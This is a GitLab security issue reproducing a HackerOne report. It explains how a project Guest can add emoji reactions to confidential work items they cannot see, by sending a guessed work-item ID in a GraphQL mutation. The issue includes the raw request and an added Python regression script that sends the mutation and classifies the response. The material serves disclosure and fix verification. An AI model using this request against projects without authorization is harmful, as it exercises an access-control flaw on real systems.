
Guest users can react (emojis) on confidential work items which they can't see in a project

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2036500 by ashish_r_padelkar on 2023-06-23, assigned to @ottilia_westerlund:


Report

Hello,

Confidential tasks can be created for an issue within a project. These confidential tasks (work items) are created as issues and are visible only to Reporters or higher user roles.

There is a bug where guest users within a project can react with emojis to such private tasks/work items even when they are confidential and can't be seen.

Steps to reproduce

1. Go to https://gitlab.com/<groupNamespace>/<projectNamespace>/-/issues and create an issue.
2. Now add a confidential task to it using the option below.
(Screenshot: Screen_Shot_2023-06-23_at_8.43.38_PM.png)
3. Add a guest user to your project or group at https://gitlab.com/groups/<groupNamespace>/-/group_members.
4. Log in as the guest user.
5. Go to the issue created in step 1.
6. You see the issue but not the task, as it's private.
7. Guess the private task item ID and replace it in the GraphQL request below.

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 316  
X-Gitlab-Feature-Category: team_planning  
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"  
X-Csrf-Token: 1  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36  
Content-Type: application/json  
Accept: */*  
Sec-Ch-Ua-Platform: "macOS"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/groupjune23/latest_project/-/work_items/25  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

[{"operationName":"updateWorkItemAwardEmojiWidget","variables":{"input":{"awardableId":"gid://gitlab/WorkItem/128497667","name":"thumbsup"}},"query":"mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {\n  awardEmojiToggle(input: $input) {\n    errors\n    toggledOn\n    __typename\n  }\n}\n"}]  

Where 128497667 is the private task's ID.

8. Also replace your Cookie and X-Csrf-Token headers.
9. Send the request; it will succeed.

Now, as an admin, check the private work item/task. You should see a thumbsup reaction on it. This happens despite the guest user not being able to see that task.

What is the current bug behavior?

Guest users can react with emojis on private work items which they can't see within a project.

What is the expected correct behavior?

Only users who have access to a private work item should be able to react to it.

Output of checks

This bug happens on GitLab.com. GitLab Enterprise Edition 16.2.0-pre 2a4d9de2b78

Regards,
Ashish

Impact

Guest users can react on confidential work items which they can't see in a project

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:
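The following script is an added example, not code from the report or from GitLab, that turns the reproduction above into a repeatable regression check. It rebuilds the awardEmojiToggle mutation and the gid://gitlab/WorkItem/<id> global ID exactly as they appear in the request in the report, sends them with a personal access token instead of the browser's Cookie/X-Csrf-Token pair (an assumption about how a tester would authenticate; GitLab's GraphQL endpoint accepts a Bearer PAT with the api scope), and classifies the server's answer: a successful toggle means the Guest could react to a confidential work item they cannot see, while a top-level GraphQL error or a non-empty errors list means access was refused. The two sample responses are constructed for offline use, and the "does not exist or you don't have permission" wording is assumed, not captured from gitlab.com.

```python
"""Regression check for HackerOne #2036500: can a Guest react to a confidential
work item they cannot see?  Added example; not code from the report or GitLab."""
import json
import os
import urllib.request

# Mutation text and variable shape copied from the request in the report.
MUTATION = (
    "mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {\n"
    "  awardEmojiToggle(input: $input) {\n    errors\n    toggledOn\n  }\n}\n"
)


def work_item_gid(numeric_id: int) -> str:
    """Global ID format used for work items in the report (gid://gitlab/WorkItem/<id>)."""
    return f"gid://gitlab/WorkItem/{int(numeric_id)}"


def build_payload(awardable_gid: str, emoji: str = "thumbsup") -> dict:
    """Single-operation body; the report used a one-element batch, which is equivalent."""
    return {
        "operationName": "updateWorkItemAwardEmojiWidget",
        "variables": {"input": {"awardableId": awardable_gid, "name": emoji}},
        "query": MUTATION,
    }


def classify(response: dict) -> str:
    """'vulnerable' if the toggle went through, 'fixed' if the server refused it,
    'unknown' if the response has neither shape."""
    if response.get("errors"):  # top-level GraphQL errors: not found / not permitted
        return "fixed"
    data = (response.get("data") or {}).get("awardEmojiToggle")
    if not data:
        return "unknown"
    if data.get("errors"):  # mutation-level errors list
        return "fixed"
    # toggledOn is a bool on success, whether the reaction was added or removed:
    # either way the Guest was allowed to act on the awardable.
    if isinstance(data.get("toggledOn"), bool):
        return "vulnerable"
    return "unknown"


def send(base_url: str, token: str, payload: dict) -> dict:
    """POST the mutation to /api/graphql authenticated with a personal access token."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/api/graphql",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


# Constructed sample responses (not captured from gitlab.com) for offline use.
VULNERABLE_RESPONSE = {"data": {"awardEmojiToggle": {"errors": [], "toggledOn": True}}}
FIXED_RESPONSE = {
    "data": {"awardEmojiToggle": None},
    "errors": [{"message": "The resource that you are attempting to access does not "
                           "exist or you don't have permission to perform this action"}],
}

if __name__ == "__main__":
    # Live run only when configured. GUEST_TOKEN must belong to a Guest member of the
    # project; WORK_ITEM_ID is the numeric ID of a confidential task they cannot see.
    base = os.environ.get("GITLAB_URL", "https://gitlab.com")
    token, item = os.environ.get("GUEST_TOKEN"), os.environ.get("WORK_ITEM_ID")
    if token and item:
        result = send(base, token, build_payload(work_item_gid(int(item))))
        print(json.dumps(result, indent=2))
        print("verdict:", classify(result))
    else:
        for name, sample in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
            print(name, "->", classify(sample))
```

Run it with GITLAB_URL, GUEST_TOKEN and WORK_ITEM_ID set against a test project; without them it only classifies the two constructed samples. Note that a successful live run leaves a thumbsup on the work item (the mutation is a toggle, so a second run removes it again), and that a guest token that is not even a member of the project should also produce "fixed", so confirm the Guest membership before trusting a "fixed" verdict.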